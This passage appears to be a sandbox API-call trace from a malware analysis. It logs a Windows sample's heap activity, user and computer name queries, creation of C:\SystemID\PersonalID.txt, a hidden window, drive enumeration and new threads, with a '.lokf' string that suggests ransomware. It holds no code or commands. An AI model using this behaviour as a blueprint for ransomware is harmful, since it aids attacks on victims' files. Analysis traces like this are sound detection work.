RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x327dcd0 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x327df38 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x327e1a0 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x327e408 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x327e670 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x327e8d8 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x327eb40 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x327eda8 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80a) returned 0x32807e8 [0042.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d880, cbMultiByte=-1, lpWideCharStr=0x32807e8, cchWideChar=1029 | out: lpWideCharStr=".lokf") returned 6 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x3281e58 [0042.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32807e8 | out: hHeap=0x660000) returned 1 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x322bc00 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32577b8 [0042.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240b28 | out: hHeap=0x660000) returned 1 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261000 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x48) returned 0x3240340 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32577b8 | out: hHeap=0x660000) returned 1 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x742440 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x7424a8 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240340 | out: hHeap=0x660000) returned 1 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32169e0 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x3283f48 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x7424a8 | out: hHeap=0x660000) returned 1 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x32610b0 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261108 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd8) returned 0x31c4a70 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3283f48 | out: hHeap=0x660000) returned 1 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216a28 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x322bbd8 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261160 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x138) returned 0x3271fe8 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c4a70 | out: hHeap=0x660000) returned 1 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x7424a8 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216a70 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x32611b8 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261210 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c8) returned 0x327f800 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3271fe8 | out: hHeap=0x660000) returned 1 [0042.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216ab8 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32693b8 | out: hHeap=0x660000) returned 1 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322bc00 | out: hHeap=0x660000) returned 1 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261000 | out: hHeap=0x660000) returned 1 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x742440 | out: hHeap=0x660000) returned 1 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32169e0 | out: hHeap=0x660000) returned 1 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32610b0 | out: hHeap=0x660000) returned 1 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261108 | out: hHeap=0x660000) returned 1 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216a28 | out: hHeap=0x660000) returned 1 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322bbd8 | out: hHeap=0x660000) returned 1 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261160 | out: hHeap=0x660000) returned 1 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x7424a8 | out: hHeap=0x660000) returned 1 [0042.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216a70 | out: hHeap=0x660000) returned 1 [0042.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32611b8 | out: hHeap=0x660000) returned 1 [0042.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261210 | out: hHeap=0x660000) returned 1 [0042.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216ab8 | out: hHeap=0x660000) returned 1 [0042.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x327f800 | out: hHeap=0x660000) returned 1 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28) returned 0x3258118 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x327f010 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x327f278 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x327f4e0 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3283f60 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x32841c8 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3284430 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3284698 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3284900 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3284b68 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3284dd0 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x32625e8 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3271fe8 [0042.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32625e8 | out: hHeap=0x660000) returned 1 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1d0) returned 0x3272120 [0042.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3271fe8 | out: hHeap=0x660000) returned 1 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2b7) returned 0x32722f8 [0042.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3272120 | out: hHeap=0x660000) returned 1 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x412) returned 0x3279450 [0042.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32722f8 | out: hHeap=0x660000) returned 1 [0042.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x61a) returned 0x32807e8 [0042.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3279450 | out: hHeap=0x660000) returned 1 [0042.180] GetUserNameW (in: lpBuffer=0x18da80, pcbBuffer=0x18d8f4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d8f4) returned 1 [0042.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x590) returned 0x32afa68 [0042.594] GetLastError () returned 0x0 [0042.601] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d5e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0042.602] GetLastError () returned 0x3 [0042.602] GetLastError () returned 0x3 [0042.602] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0042.602] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18d5e8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x688 [0042.602] GetFileType (hFile=0x688) returned 0x1 [0042.602] GetLastError () returned 0x0 [0042.608] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0042.609] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0042.609] RegisterClassExW (param_1=0x18d860) returned 0xc13c [0042.609] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x5011e [0042.609] NtdllDefWindowProc_W () returned 0x0 [0042.609] NtdllDefWindowProc_W () returned 0x1 [0042.611] NtdllDefWindowProc_W () returned 0x0 [0042.695] NtdllDefWindowProc_W () returned 0x0 [0042.696] ShowWindow (hWnd=0x5011e, nCmdShow=0) returned 0 [0042.696] UpdateWindow (hWnd=0x5011e) returned 1 [0042.696] GetLogicalDrives () returned 0x4 [0042.696] SetErrorMode (uMode=0x1) returned 0x0 [0042.696] PathFileExistsA (pszPath="C:\\") returned 1 [0042.696] SetErrorMode (uMode=0x0) returned 0x1 [0042.696] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0042.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x806) returned 0x32b51f8 [0042.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d818, cbMultiByte=-1, lpWideCharStr=0x32b51f8, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0042.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x32b5a08 [0042.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b51f8 | out: hHeap=0x660000) returned 1 [0042.696] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242328 [0042.696] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b5a08 | out: hHeap=0x660000) returned 1 [0042.697] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242328 | out: hHeap=0x660000) returned 1 [0042.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242328 [0042.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x326f358 [0042.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8ec) returned 0x32b51f8 [0042.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x32b5af0 [0042.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c238f8 [0042.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1070) returned 0x32b10f8 [0042.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b2b0 [0042.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x32b6308 [0042.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x660) returned 0x32b6b20 [0042.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c32a50 [0042.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c332d8 [0042.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c33b60 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c343e8 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c34c70 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x32b2170 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c354f8 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c35d80 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x32b29b8 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x9c42a38 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x9c432a0 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c36608 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c36e90 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c43b08 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c44350 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c37718 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c37fa0 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c38828 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c390b0 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c39938 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c3a1c0 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c3aa48 [0042.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c3b2d0 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c3bb58 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c3c3e0 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x9c44b98 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x9c45400 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c3cc68 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c3d4f0 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c3dd78 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c45c68 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c464b0 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c3e600 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c3ee88 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c3f710 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c3ff98 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c40820 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c410a8 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c41930 [0042.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c46d10 [0042.700] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c47598 [0042.700] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x9c56cf8 [0042.700] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x9c57560 [0042.700] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c47e20 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c486a8 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c48f30 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c57dc8 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c497b8 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c4a040 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c4a8c8 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c4b150 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c4b9d8 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c4c260 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c4cae8 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c4d370 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c4dbf8 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c4e480 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x9c58610 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x9c58e78 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c4ed08 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c4f590 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c4fe18 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c506a0 [0042.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c50f28 [0042.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c517b0 [0042.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c52038 [0042.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c528c0 [0042.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c53148 [0042.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228878 [0042.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c539d0 [0042.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c596e0 [0042.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c59ef8 [0042.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c54258 [0042.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c54ae0 [0042.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c55368 [0042.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c55bf0 [0042.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5a728 [0042.703] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b318 [0042.703] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5afb0 [0042.703] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5b838 [0042.703] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5c0c0 [0042.703] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5c948 [0042.703] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x110) returned 0x32829b0 [0042.703] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x32b5200, dwCreationFlags=0x0, lpThreadId=0x326f360 | out: lpThreadId=0x326f360*=0x9e0) returned 0x690 [0042.704] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x9e4) returned 0x694 [0042.704] GetMessageW (in: lpMsg=0x18da10, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18da10) returned 0 [0058.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0058.370] GetComputerNameW (in: lpBuffer=0x3297a68, nSize=0x18cd8c | out: lpBuffer="XDUWTFONO", nSize=0x18cd8c) returned 1 [0058.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.370] IsWindow (hWnd=0x5011e) returned 1 [0058.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.464] IsWindow (hWnd=0x5011e) returned 1 [0061.464] DestroyWindow (hWnd=0x5011e) returned 1 [0061.464] NtdllDefWindowProc_W () returned 0x0 [0061.464] PostQuitMessage (nExitCode=0) [0061.465] NtdllDefWindowProc_W () returned 0x0 [0061.465] CloseHandle (hObject=0x3a4) returned 1 [0061.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242328 | out: hHeap=0x660000) returned 1 [0061.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328d8e8 | out: hHeap=0x660000) returned 1 [0061.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328d910 | out: hHeap=0x660000) returned 1 [0061.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328d938 | out: hHeap=0x660000) returned 1 [0061.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328d960 | out: hHeap=0x660000) returned 1 [0061.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328d988 | out: hHeap=0x660000) returned 1 [0061.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328d9b0 | out: hHeap=0x660000) returned 1 [0061.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b200 | out: hHeap=0x660000) returned 1 [0061.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b238 | out: hHeap=0x660000) returned 1 [0061.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328d9d8 | out: hHeap=0x660000) returned 1 [0061.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328da00 | out: hHeap=0x660000) returned 1 [0061.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328da28 | out: hHeap=0x660000) returned 1 [0061.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328da50 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328da78 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328daa0 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dac8 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b270 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b2a8 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328daf0 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328db18 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328db40 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328db68 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328db90 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dbb8 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dbe0 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dc08 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b2e0 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b318 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dc30 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dc58 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dc80 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dca8 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dcd0 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dcf8 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dd20 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dd48 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b350 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b388 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dd70 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dd98 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ddc0 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328dde8 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, 